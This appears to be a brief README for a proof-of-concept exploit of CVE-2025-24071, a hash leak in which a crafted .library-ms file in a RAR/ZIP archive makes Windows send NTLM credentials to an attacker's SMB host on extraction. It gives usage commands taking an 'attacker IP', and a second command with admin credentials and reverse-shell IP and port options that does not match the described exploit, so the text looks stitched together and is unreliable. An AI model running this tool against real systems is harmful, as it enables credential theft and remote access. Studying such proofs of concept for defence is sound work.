
Proof-of-concept for CVE-2025-24071, demonstrating NTLM hash leak via crafted .library-ms file in RAR/ZIP archives, triggering SMB authentication on extraction.
CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888